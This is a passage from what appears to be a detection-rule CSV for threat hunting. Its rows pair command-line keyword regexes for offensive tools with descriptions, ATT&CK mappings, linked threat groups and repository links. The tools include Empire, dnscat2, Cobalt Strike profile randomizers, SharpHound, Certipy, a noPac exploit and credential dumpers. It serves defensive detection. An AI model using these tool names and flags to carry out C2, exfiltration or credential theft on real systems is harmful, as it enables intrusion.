Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-BypassUACTokenManipulation.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","873" "* --dns domain=skullseclabs.org*",".{0,1000}\s\-\-dns\sdomain\=skullseclabs\.org.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","0","#content #linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","874" "* -dns_stager_prepend 
*",".{0,1000}\s\-dns_stager_prepend\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","875" "* -dns_stager_subhost *",".{0,1000}\s\-dns_stager_subhost\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based 
detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","876" "* DNS-Black-CAT Server *",".{0,1000}\sDNS\-Black\-CAT\sServer\s.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - 
TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","877" "* dns-blacklist.nse*",".{0,1000}\sdns\-blacklist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","878" "* dns-brute.nse*",".{0,1000}\sdns\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","879" "* dns-cache-snoop.nse*",".{0,1000}\sdns\-cache\-snoop\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","880" "* dnscan.py*",".{0,1000}\sdnscan\.py.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","881" "* dns-check-zone.nse*",".{0,1000}\sdns\-check\-zone\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","882" "* dnschef.exe*",".{0,1000}\sdnschef\.exe.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. 
For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","883" "* dnschef.py*",".{0,1000}\sdnschef\.py.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","884" "* dns-client-subnet-scan.nse*",".{0,1000}\sdns\-client\-subnet\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","885" "* dnscrypt-proxy*",".{0,1000}\sdnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","886" "* --dnsdump *",".{0,1000}\s\-\-dnsdump\s.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","887" "* dnsdump.py*",".{0,1000}\sdnsdump\.py.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","N/A","10","997","118","2025-04-04T09:28:20Z","2019-04-24T17:18:46Z","888" "* dns-fuzz.nse*",".{0,1000}\sdns\-fuzz\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","889" "* dns-ip6-arpa-scan.nse*",".{0,1000}\sdns\-ip6\-arpa\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","890" "* dnskire:dnskire *",".{0,1000}\sdnskire\:dnskire\s.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","891" "* dnslog-cn.nse*",".{0,1000}\sdnslog\-cn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. 
Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","N/A","4","351","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z","892" "* dns-nsec3-enum.nse*",".{0,1000}\sdns\-nsec3\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","893" "* dns-nsec-enum.nse*",".{0,1000}\sdns\-nsec\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","894" "* dns-nsid.nse*",".{0,1000}\sdns\-nsid\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","895" "* dns-random-srcport.nse*",".{0,1000}\sdns\-random\-srcport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","896" "* dns-random-txid.nse*",".{0,1000}\sdns\-random\-txid\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","897" "* dns-recursion.nse*",".{0,1000}\sdns\-recursion\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","898" "* dns-service-discovery.nse*",".{0,1000}\sdns\-service\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","899" "* dns-srv-enum.nse*",".{0,1000}\sdns\-srv\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","900" "* dnsstager.py*",".{0,1000}\sdnsstager\.py.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","901" "* -dns-tcp -nameserver * -dc-ip*",".{0,1000}\s\-dns\-tcp\s\-nameserver\s.{0,1000}\s\-dc\-ip.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","902" "* dns-update.nse*",".{0,1000}\sdns\-update\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","903" "* dns-zeustracker.nse*",".{0,1000}\sdns\-zeustracker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","904" "* dns-zone-transfer.nse*",".{0,1000}\sdns\-zone\-transfer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","905" "* docker-version.nse*",".{0,1000}\sdocker\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","906" "* Do-Exfiltration.ps1*",".{0,1000}\sDo\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","907" "* --doLocalAdminSessionEnum*",".{0,1000}\s\-\-doLocalAdminSessionEnum.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","908" "* -domain * /dc * /service cifs /ptt*",".{0,1000}\s\-domain\s.{0,1000}\s\/dc\s.{0,1000}\s\/service\scifs\s\/ptt.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tool","https://github.com/ricardojba/noPac","1","0","N/A","N/A","N/A","1","36","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z","909" "* -Domain * -SMB1 
*",".{0,1000}\s\-Domain\s.{0,1000}\s\-SMB1\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-SMBExec.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","910" "* domainDumper*",".{0,1000}\sdomainDumper.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - 
T1016","TA0007","N/A","EMBER BEAR","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","0","N/A","N/A","10","10","1242","201","2025-04-06T13:31:57Z","2016-05-24T18:46:56Z","911" "* domainhunter *",".{0,1000}\sdomainhunter\s.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","N/A","10","1587","292","2024-06-06T21:01:21Z","2017-03-01T11:16:26Z","912" "* --domains ./domains.txt run*",".{0,1000}\s\-\-domains\s\.\/domains\.txt\srun.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","#linux","N/A","6","8","715","117","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z","913" "* DomainTrustRecon.ahk*",".{0,1000}\sDomainTrustRecon\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","914" "* domcachedump.py*",".{0,1000}\sdomcachedump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","915" "* 
